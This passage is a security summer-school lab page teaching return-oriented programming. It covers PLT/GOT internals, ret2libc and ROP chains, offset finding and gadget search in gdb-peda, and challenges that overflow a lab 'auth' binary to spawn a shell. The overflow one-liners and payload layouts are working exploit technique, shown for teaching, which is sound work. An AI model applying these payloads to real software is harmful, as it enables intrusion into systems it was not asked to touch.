====== 0x08. Return Oriented Programming ======

===== Resources =====

[[https://security.cs.pub.ro/summer-school/res/slides/11-return-oriented-programming.pdf|Session 08 slides]]

[[https://github.com/hexcellents/sss-exploit|Session's tutorials and challenges repo]]

[[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-full.zip|Session's solutions]]


=== PLT and GOT ===

ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign address to libraries in a round-robin fashion, or could use ASLR to assign them randomly.

Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the ''.text'' section, which should only be **readable** and **executable**.

To solve this problems we need another level of indirection: all memory accessed to symbols located in shared libraries will read the actual address from a table, called **Global Offset Table (''.got'')**, at runtime. The loader will populate this table. Note that this can work both for data accesses, as well as for function calls, however function calls are actually using a small stub (i.e., a few instructions) stored in the **Procedure Linkage Table (''.plt'')**.

The PLT is responsible of finding the shared library function address when it is first called (**lazy binding**), and writing it to a GOT entry. Note that the function pointers are stored in ''.got.plt''). The following calls use the pre-resolved address.

Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls ''puts()''.

<code bash>
~$ objdump -D -j .text -M intel hello | grep puts      
</code>
<code text>
 80483e4:	e8 07 ff ff ff       	call   80482f0 <puts@plt>
</code>

We can see that the ''.plt'' section will start at address ''0x080482e0'', right where the previous call will jump:

<code bash>
~$ readelf --sections hello
</code>

<code text>
...
  [12] .plt              PROGBITS        080482e0 0002e0 000040 04  AX  0   0 16
...
</code>

Let's see how the code there looks like:

<code bash>
~$ objdump -D -j .plt -M intel hello | grep -A 3 '<puts@plt>'
</code>

<code text>
080482f0 <puts@plt>:
 80482f0:	ff 25 00 a0 04 08    	jmp    DWORD PTR ds:0x804a000
 80482f6:	68 00 00 00 00       	push   0x0
 80482fb:	e9 e0 ff ff ff       	jmp    80482e0 <_init+0x30>
</code>

We see it jumping to a pointer stored at ''0x804a000'' in the data section. Let's check the binary relocations for that location:

<code bash>
~$ readelf --relocs hello
</code>

<code text>
...
Relocation section '.rel.plt' at offset 0x298 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a000  00000107 R_386_JUMP_SLOT   00000000   puts
...
</code>

Ok, good, but what is actually stored at this address initially?

<code bash>
~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello
</code>

<code text>
hello:     file format elf32-i386

Contents of section .got.plt:
 804a000 f6820408 06830408 16830408           ............
</code>

We recognize ''f6820408'' (''0x80482f6'') as being the next instruction in the ''puts@plt'' stub that we disassembled above. Which then pushes 0 in the stack and calls ''0x80482e0''. This is the call to the one-time resolver, and it looks like this:

<code bash>
~$ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0'
</code>

<code text>
080482e0 <puts@plt-0x10>:
 80482e0:	ff 35 f8 9f 04 08    	push   DWORD PTR ds:0x8049ff8
 80482e6:	ff 25 fc 9f 04 08    	jmp    DWORD PTR ds:0x8049ffc
 80482ec:	00 00                	add    BYTE PTR [eax],al
</code>

<note>
Going further into the resolver is left as an exercise. You can use GDB to inspect the address in ''0x8049ffc'', and what happens when this jumps there.
</note>

What's going on here? What's actually happening is //lazy binding// — by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instruction. The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo". It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stub. Ingenious!


==== Return Oriented Programming ====

{{ :session:rop.png?nolink&600 |}}

=== Motivation ===
In the previous sessions we discussed ''ret2libc'' attacks. The standard attack was to overwrite in the following way:
<code>
RET + 0x00:   addr of system
RET + 0x04:   JUNK
RET + 0x08:   address to desired command (e.g. '/bin/sh')
</code>

However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be:
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of f2 (return address after f1 finishes)
RET + 0x08:   JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called)
RET + 0x0c:   0xAB (param1 of f2)
RET + 0x10:   0xCD (param2 of f2)
</code>
What about if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42) ?
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of f2 (return address after f1 finishes)
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2)
RET + 0x10:   0x42 (param2 of f2) 
</code>

This kind of conflict can be resolved using Return Oriented Programming, a generalization of ''ret2libc'' attacks.

=== NOP analogy ===
While ''ret2libc'' uses functions directly, Return Oriented Programming uses a finer level of code execution: instruction groups.
Let's explore an example:
<code c>
int main()
{
	char a[16];
	read(0, a, 100);

	return 0;
}
</code>
This code obviously suffers from a stack buffer overflow. The offset to the return address is 28. So dwords from offset 28 onwards will be popped from the stack and executed.
Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions ("\x90") used to pad a payload for alignment purposes.
Since we can't add any new code to the program (NX is enabled) how could we simulate the effect of a NOP sled? Easy! Using return instructions!
<code>
# objdump  -d a -M intel | grep $'\t'ret
 80482dd:	c3                   	ret    
 804837a:	c3                   	ret    
 80483b7:	c3                   	ret    
 8048437:	c3                   	ret    
 8048444:	c3                   	ret    
 80484a9:	c3                   	ret    
 80484ad:	c3                   	ret    
 80484c6:	c3                   	ret    
</code>
Any and all of these addresses will be ok. The payload could be the following:
<code>
RET + 0x00:   0x80482dd
RET + 0x04:   0x80482dd
RET + 0x08:   0x80482dd
RET + 0x0c:   0x80482dd
RET + 0x10:   0x80482dd
.....
</code>
The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When it gets popped the stack is automatically increased by 4 (on to the next value). The instruction at ''0x80482dd'' is another ''ret'' which does the same thing as before. This goes on until another address is popped off the stack that is not a ''ret''.

That payload is not the only option. We don't really care which ''ret'' we pick. The payload could very well look like this:
<code>
RET + 0x00:   0x80482dd
RET + 0x04:   0x804837a
RET + 0x08:   0x80483b7
RET + 0x0c:   0x8048437
RET + 0x10:   0x80484c6
.....
</code>
Notice the addresses are different but because they all point to a ''ret'' instruction they will all have the same net effect on the code flow.

<note warning>
Take a moment to fully understand what is happening here. Run your own program and step through the payload to see this in action before proceeding.
Follow along using this skeleton to generate the payloads.
</note>
<file python skel.py>
#!/usr/bin/python
import struct, sys

def dw(i):
	return struct.pack("<I", i)

#TODO update count for your prog
pad_count_to_ret = 100
payload = "X" * pad_count_to_ret

#TODO figure out the rop chain
payload += dw(0xcafebeef)
payload += dw(0xdeadc0de)


sys.stdout.write(payload)

</file>


=== Gadgets & ROP chains ===
Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful.
The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a 'ret' instruction.
Here are some 'gadgets' from the previous program:
<code>
0x8048443: pop ebp; ret
0x80484a7: pop edi; pop ebp; ret
0x8048441: mov ebp,esp; pop ebp; ret
0x80482da: pop eax; pop ebx; leave; ret
0x80484c3: pop ecx; pop ebx; leave; ret
</code>

By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want.
As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like:
<code>
RET + 0x00:   0x80482da  (pop eax; pop ebx; leave; ret)
RET + 0x04:   0x41424344
RET + 0x08:   0x61626364
RET + 0x0c:   0xAABBCCDD ???
</code>
  * First the ret addr is popped from the stack and execution goes there.
  * At ''pop eax'' 0x41424344 is loaded into eax and the stack is increased
  * At ''pop ebx'' 0x61626364 is loaded into ebx and the stack is increased again
  * At ''leave'' two things actually happen: "mov esp, ebp; pop ebp". So the stack frame is decreased to the previous one (pointed by ebp) and ebp is updated to the one before that. So esp will now be the old ebp+4
  * At ''ret'' code flow will go to the instruction pointed to by ebp+4. This implies that execution will __not__ go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain.

We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers.
As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters:
  * 1st param: RDI
  * 2nd param: RSI
  * 3rd param: RDX
Next we would need gadgets for each. Let's assume these 2 scenarios:
Scenario 1:
<code>
0x400124:  pop rdi; pop rsi; ret
0x400235:  pop rdx; ret
0x400440:  f1()

Payload:
RET + 0x00:   0x400124
RET + 0x08:   val of RDI (0xAB)
RET + 0x10:   val of RSI (0xCD)
RET + 0x18:   0x400235
RET + 0x20:   val of RDX
RET + 0x28:   f1
</code>

Scenario 2:
<code>
0x400125:  pop rdi; ret
0x400252:  pop rsi; ret
0x400235:  pop rdx; ret
0x400440:  f1()

Payload:
RET + 0x00:   0x400125
RET + 0x08:   val of RDI (0xAB)
RET + 0x10:   0x400252
RET + 0x18:   val of RSI (0xCD)
RET + 0x20:   0x400235 
RET + 0x28:   val of RDX
RET + 0x30:   f1
</code>
Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide)


The second use of gadgets is to clear the stack. Remember the issue we had in the **Motivation** section? Let's solve it using gadgets.
We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was:
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of f2 (return address after f1 finishes)
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2)
RET + 0x10:   0x42 (param2 of f2) 
</code>

The problem is that those parameters of f1 are getting in the way of calling f2. We need to find a **pop pop ret** gadget. The actual registers are not important.

<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of (pop eax, pop ebx, ret) 
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)
RET + 0x10:   addr of f2
RET + 0x14:   JUNK
RET + 0x18:   0xEF (param1 of f2)
RET + 0x1c:   0x42 (param2 of f2) 
</code>
Now we can even call the next function f3 if we repeat the trick:
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of (pop eax, pop ebx, ret) 
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)
RET + 0x10:   addr of f2
RET + 0x14:   addr of (pop eax, pop ebx, ret) 
RET + 0x18:   0xEF (param1 of f2)
RET + 0x1c:   0x42 (param2 of f2) 
RET + 0x20:   addr of f3
</code>


==== Some useful ninja tricks ====

=== Memory spraying ===
Let's take the following prog:
<code c>
int main()
{
        int x, y ,z;
        char a,b,c;
        char buf[23];
        read(0, buf, 100);

        return 0;
}
</code>

A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need ?
There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly.

A [[ https://en.wikipedia.org/wiki/De_Bruijn_sequence | De Bruijn sequence ]] is a string of symbols out of a given alphabet  in which each consecutive K symbols only appear once in the whole string. If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address.

Peda can help you do this. Here's how:
<code bash>
gdb-peda$ help pattern_create 
Generate a cyclic pattern
Usage:
    pattern_create size [file]

gdb-peda$ pattern_create 100
'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl'

gdb-peda$ help pattern_offset 
Search for offset of a value in cyclic pattern
Usage:
    pattern_offset value

gdb-peda$ pattern_offset AA8A
AA8A found at offset: 76
</code>

Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised:
<code bash>
# gdb -q ./a
Reading symbols from ./a...(no debugging symbols found)...done.
gdb-peda$ pattern_create 200
'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A'
gdb-peda$ run
AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xf7f97e54 --> 0x1a6d5c 
ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
EDX: 0x64 ('d')
ESI: 0x0 
EDI: 0x0 
EBP: 0x41334141 ('AA3A')
ESP: 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
EIP: 0x41414541 ('AEAA')
EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414541
[------------------------------------stack-------------------------------------]
0000| 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0004| 0xffffcd74 ("AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0008| 0xffffcd78 ("AfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0012| 0xffffcd7c ("5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0016| 0xffffcd80 ("AAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0020| 0xffffcd84 ("A6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl")
0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl")
0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl")
0048| 0xffffcda0 ("9AAKAAkAALAAl")
0052| 0xffffcda4 ("AAkAALAAl")
0056| 0xffffcda8 ("ALAAl")
0060| 0xffffcdac --> 0x6c ('l')

[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414541 in ?? ()


gdb-peda$ pattern_search 
Registers contain pattern buffer:
EIP+0 found at offset: 35
EBP+0 found at offset: 31
Registers point to pattern buffer:
[ECX] --> offset 0 - size ~100
[ESP] --> offset 39 - size ~61
Pattern buffer found at:
0xffffcd49 : offset    0 - size  100 ($sp + -0x27 [-10 dwords])
0xffffd1c6 : offset 23424 - size    4 ($sp + 0x456 [277 dwords])
0xffffd1d8 : offset 22930 - size    4 ($sp + 0x468 [282 dwords])
0xffffd276 : offset 48535 - size    4 ($sp + 0x506 [321 dwords])
References to pattern buffer found at:
0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords])
0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords])

</code>


=== Vulnerable function identification ===
As you can see from above, the base pointer gets trashed so backtracing is not possible
<code bash>
gdb-peda$ bt
#0  0x41414541 in ?? ()
#1  0x34414165 in ?? ()
#2  0x41464141 in ?? ()
#3  0x41416641 in ?? ()
</code>
If this program was larger you wouldn't know which "ret" is the last one executed before jumping into the payload.
You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then ignoring them:
<code bash>
gdb-peda$ rbreak 
Breakpoint 1 at 0x80482d4
<function, no debug info> _init;
Breakpoint 2 at 0x8048310
<function, no debug info> read@plt;
Breakpoint 3 at 0x8048320
<function, no debug info> __gmon_start__@plt;
Breakpoint 4 at 0x8048330
<function, no debug info> __libc_start_main@plt;
Breakpoint 5 at 0x8048340
<function, no debug info> _start;
Breakpoint 6 at 0x8048370
<function, no debug info> __x86.get_pc_thunk.bx;
Breakpoint 7 at 0x804843f
<function, no debug info> main;
Breakpoint 8 at 0x8048470
<function, no debug info> __libc_csu_init;
Breakpoint 9 at 0x80484e0
<function, no debug info> __libc_csu_fini;
Breakpoint 10 at 0x80484e4
<function, no debug info> _fini;


gdb-peda$ commands
Type commands for breakpoint(s) 1-10, one per line.
End with a line saying just "end".
>continue
>end


gdb-peda$ run
Starting program: /ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/a 
warning: the debug information found in "/usr/lib64/debug/lib64/ld-2.17.so.debug" does not match "/lib/ld-linux.so.2" (CRC mismatch).

warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?

Breakpoint 4, 0x08048330 in __libc_start_main@plt ()

Breakpoint 8, 0x08048470 in __libc_csu_init ()

Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx ()

Breakpoint 1, 0x080482d4 in _init ()

Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx ()

Breakpoint 7, 0x0804843f in main ()

Breakpoint 2, 0x08048310 in read@plt ()

AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7

Program received signal SIGSEGV, Segmentation fault.
0x41414541 in ?? ()
</code>


=== ROP payload debugging ===
When you know what the offending function is, disassemble it and break on "ret"
<code bash>
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x0804843c <+0>:	push   ebp
   0x0804843d <+1>:	mov    ebp,esp
   0x0804843f <+3>:	and    esp,0xfffffff0
   0x08048442 <+6>:	sub    esp,0x30
   0x08048445 <+9>:	mov    DWORD PTR [esp+0x8],0x64
   0x0804844d <+17>:	lea    eax,[esp+0x19]
   0x08048451 <+21>:	mov    DWORD PTR [esp+0x4],eax
   0x08048455 <+25>:	mov    DWORD PTR [esp],0x0
   0x0804845c <+32>:	call   0x8048310 <read@plt>
   0x08048461 <+37>:	mov    eax,0x0
   0x08048466 <+42>:	leave  
   0x08048467 <+43>:	ret    
End of assembler dump.
gdb-peda$ b *0x08048467
Breakpoint 1 at 0x8048467


AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xf7f97e54 --> 0x1a6d5c 
ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034")
EDX: 0x64 ('d')
ESI: 0x0 
EDI: 0x0 
EBP: 0x41334141 ('AA3A')
ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034")
EIP: 0x8048467 (<main+43>:	ret)
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048445 <main+9>:	mov    DWORD PTR [esp+0x8],0x64
   0x804844d <main+17>:	lea    eax,[esp+0x19]
   0x8048451 <main+21>:	mov    DWORD PTR [esp+0x4],eax
   0x8048455 <main+25>:	mov    DWORD PTR [esp],0x0
   0x804845c <main+32>:	call   0x8048310 <read@plt>
   0x8048461 <main+37>:	mov    eax,0x0
   0x8048466 <main+42>:	leave  
=> 0x8048467 <main+43>:	ret    
   0x8048468:	xchg   ax,ax
   0x804846a:	xchg   ax,ax
   0x804846c:	xchg   ax,ax
   0x804846e:	xchg   ax,ax
   0x8048470 <__libc_csu_init>:	push   ebp
   0x8048471 <__libc_csu_init+1>:	push   edi
   0x8048472 <__libc_csu_init+2>:	xor    edi,edi
   0x8048474 <__libc_csu_init+4>:	push   esi
[------------------------------------stack-------------------------------------]
0000| 0xffffcd6c --> 0xf7e333e0 (<system>:	sub    esp,0x1c)
0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>:	pop    ebp)
0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh")
0012| 0xffffcd78 --> 0xf7e25c00 (<exit>:	push   ebx)


gdb-peda$ patto AEAAeAA4AAFAAfA
AEAAeAA4AAFAAfA found at offset: 35
</code>

Then you can break on all called functions or step as needed to see if the payload is doing what you want it to.


=== checksec in peda ===
<code bash>
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
</code>


=== gadget finding in peda ===
Apart from **objdump** which only finds aligned instructions, you can also use **dumprop** in peda to find all gadgets in a memory region or mapping:
<code bash>
gdb-peda$ start
....
gdb-peda$ dumprop
Warning: this can be very slow, do not run for large memory range
Writing ROP gadgets to file: a-rop.txt ...
0x8048467: ret
0x804835d: iret
0x804838f: repz ret
0x80483be: ret 0xeac1
0x80483a9: leave; ret
0x80485b4: inc ecx; ret
0x80484cf: pop ebp; ret
0x80482f5: pop ebx; ret
0x80484df: nop; repz ret
0x80483a8: ror cl,1; ret
0x804838e: add dh,bl; ret
0x80483e5: ror cl,cl; ret
0x8048465: add cl,cl; ret
0x804840b: leave; repz ret
0x8048371: sbb al,0x24; ret
0x80485b3: adc al,0x41; ret
0x8048370: mov ebx,[esp]; ret
0x80484de: nop; nop; repz ret
0x80483a7: call eax; leave; ret
0x80483e4: call edx; leave; ret
0x804840a: add ecx,ecx; repz ret
0x80484ce: pop edi; pop ebp; ret
</code>

Something finer is:
<code bash>
gdb-peda$ asmsearch "pop ? ; ret"
0x080482f5 : (5bc3)	pop    ebx;	ret
0x080484cf : (5dc3)	pop    ebp;	ret
0x080484f6 : (5bc3)	pop    ebx;	ret

gdb-peda$ asmsearch "pop ? ; pop ? ; ret"
0x080484ce : (5f5dc3)	pop    edi;	pop    ebp;	ret

gdb-peda$ asmsearch "call ?"
0x080483a7 : (ffd0)	call   eax
0x080483e4 : (ffd2)	call   edx
0x0804842f : (ffd0)	call   eax

</code>

=== Anti-anti-debugging and others ===
There can be various annoyances in binaries: **ptrace** calls for anti-debugging, **sleep** calls to prevent bruteforcing or **fork** calls to use child processes to serve requests.
These can all be deactivated using **unptrace** (for ptrace) and **deactive** in peda.


===== Challenges =====

==== 00. Tutorial - Bypass NX Stack with return-to-libc ====

Go to the ''01-tutorial-ret-to-libc/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process (on its stack) and redirect execution to it. This attack is easily defeated by making the stack, together with any other memory page that can be modified, non-executable. This is achieved by setting the NX bit in the page table.

We will try to bypass this protection for the ''01-tutorial-ret-to-libc/src/auth'' binary in the lab archive. Build the auth program or use the already compiled one. For now, disable ASLR in the a new shell:

<code>
setarch $(uname -m) -R /bin/bash
</code>

Let's take a look at the program headers and confirm that the stack is no longer executable. We only have read and write (RW) permissions for the stack area.

<note important>
The auth binary requires the ''libssl1.0.0:i386'' Debian package to work. Recompiling it requires ''libssl-dev:i386'', which might remove ''gcc''. So make sure you also install ''gcc'' afterwards.

You can find ''libssl1.0.0:i386'' Debian package [[https://packages.debian.org/jessie/i386/libssl1.0.0/download | here ]].
</note>

<code bash>
$ checksec 1-random
    [...]
    NX:       NX enabled
    [...]
</code>
For completeness, lets check that there is indeed a buffer (stack) overflow vulnerability.
<code>
$ python -c 'print "A" * 1357' | ltrace -i ./auth
[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...>
[0x8048601] malloc(20)                                                                            = 0x0804b008
[0x80485df] puts("Enter password: "Enter password: 
)                                                              = 17
[0x80485ea] gets(c, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7)                        = 0xbfffee63
[0x8048652] memset(0x0804b008, '\000', 20)                                                        = 0x0804b008
[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x41000001)                                       = 0x804b008
[0x41414141] --- SIGSEGV (Segmentation fault) ---
[0xffffffff] +++ killed by SIGSEGV +++
</code>

Check the source file - the buffer length is ''1337'' bytes. There should be a base pointer and the ''main()'''s return address just before it on the stack. There is also some alignment involved, but we can easily try a few lengths to get the right position of the return address. Seems to be ''1337 + 16'' followed by the return address for this case. You can, of course, determine the distance between the buffer's start address and the frame's return address exactly using ''objdump'', but we will leave that as an exercise.

We can now jump anywhere. Unfortunately, we cannot put a shellcode in the buffer and jump into it because the stack is non-executable now. Lets try it with a few NOPs. Our buffer's address is ''0xbfffee63'' (see the ''gets()'' call).
<code>
$ python -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | ltrace -i ./auth
[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...>
[0x8048601] malloc(20)                                                                            = 0x0804b008
[0x80485df] puts("Enter password: "Enter password: 
)                                                              = 17
[0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7)                        = 0xbfffee63
[0x8048652] memset(0x0804b008, '\000', 20)                                                        = 0x0804b008
[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x90000001)                                       = 0x804b008
[0xbfffee63] --- SIGSEGV (Segmentation fault) ---
[0xffffffff] +++ killed by SIGSEGV +++
</code>
Oh, such a bummer! It didn't work. How about we try to jump to some existing code?
<code>
$ objdump -d auth | grep -A 15 "<check_password>:"
080485ec <check_password>:
 80485ec:	55                   	push   %ebp
 80485ed:	89 e5                	mov    %esp,%ebp
 80485ef:	81 ec 58 05 00 00    	sub    $0x558,%esp
 80485f5:	c7 04 24 14 00 00 00 	movl   $0x14,(%esp)
 80485fc:	e8 9f fe ff ff       	call   80484a0 <malloc@plt>
 8048601:	a3 38 a0 04 08       	mov    %eax,0x804a038
 8048606:	a1 38 a0 04 08       	mov    0x804a038,%eax
 804860b:	85 c0                	test   %eax,%eax
 804860d:	75 18                	jne    8048627 <check_password+0x3b>
 804860f:	c7 04 24 76 87 04 08 	movl   $0x8048776,(%esp)
 8048616:	e8 95 fe ff ff       	call   80484b0 <puts@plt>
 804861b:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)
 8048622:	e8 99 fe ff ff       	call   80484c0 <exit@plt>
 8048627:	8d 85 bb fa ff ff    	lea    -0x545(%ebp),%eax
 804862d:	89 04 24             	mov    %eax,(%esp)
</code>
Lets try ''0x804860f'' such that we print the ''malloc'' failure message.
<code>
$ python -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./auth
[0x80485df] puts("Enter password: "Enter password: 
)                                                              = 17
[0x804861b] puts("malloc failed"malloc failed
)                                                                 = 14
[0xffffffff] +++ exited (status 1) +++

</code>


==== 01. Challenge - ret-to-libc ====

Looks good! Let's get serious and do something useful with this.

Continue working in the ''01-tutorial-ret-to-libc/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

The final goal of this task is to bypass the NX stack protection and call ''system("/bin/sh")''. We will start with a simple **ret-to-plt**:

  - Display all ''libc'' functions linked with the ''auth'' binary.
  - Return to ''puts()''. Use ''ltrace'' to show that the call is actually being made.
  - Find the offset of the ''“malloc failed”'' static string in the binary.
  - Make the binary print ''"failed"'' the second time ''puts'' is called.
  - **(bonus)** The process should ''SEGFAULT'' after printing ''"Enter password:"'' again. Make it exit cleanly (the exit code does not matter, just no ''SIGSEGV''). You can move on to the next task without solving this problem.
  - Remember how we had ASLR disabled? The other ''libc'' functions are in the memory, you just need to find their addresses. Find the offset of ''system()'' in ''libc''. Find the offset of the ''"/bin/sh"'' string in ''libc''.
  - Where is ''libc'' linked in the ''auth'' binary? Compute the final addresses and call ''system("/bin/sh")'' just like you did with ''puts''.
<note important>
//Hint//: Use ''LD_TRACE_LOADED_OBJECTS=1 ./auth'' instead of ''ldd''. The latter is not always reliable because the order in which it loads the libraries might be different than when you actually run the binary.
</note>

<note important>
//Hint//: When you will finally attack this, ''stdin'' will get closed and the new shell will have nothing to read. Use cat to concatenate your attack string with ''stdin'' like this: ''cat <(python -c 'print "L33T_ATTACK"') - | ./vulnbinary''.
</note>

==== 02. Challenge - no-ret-control ====

Go to the ''02-challenge-no-ret-control/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

Imagine this scenario: we have an executable where we can change at least 4B of random memory, but ASLR is turned on. We cannot reliably change the value of the return address because of this. Sometimes ret is not even called at the end of a function.

Alter the execution of ''force_exit'', in order to call the secret function.

==== 03. Challenge - ret-to-plt ====

Go to the ''03-challenge-ret-to-plt/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

''random'' is a small application that generates a random number.

Your task is to build an exploit that makes the application always print the **same second random number**. That is the first printed random number is whatever, but the second printed random number will always be the same, for all runs. In the sample output below the second printed random number is always ''1023098942'' for all runs.

<code text>
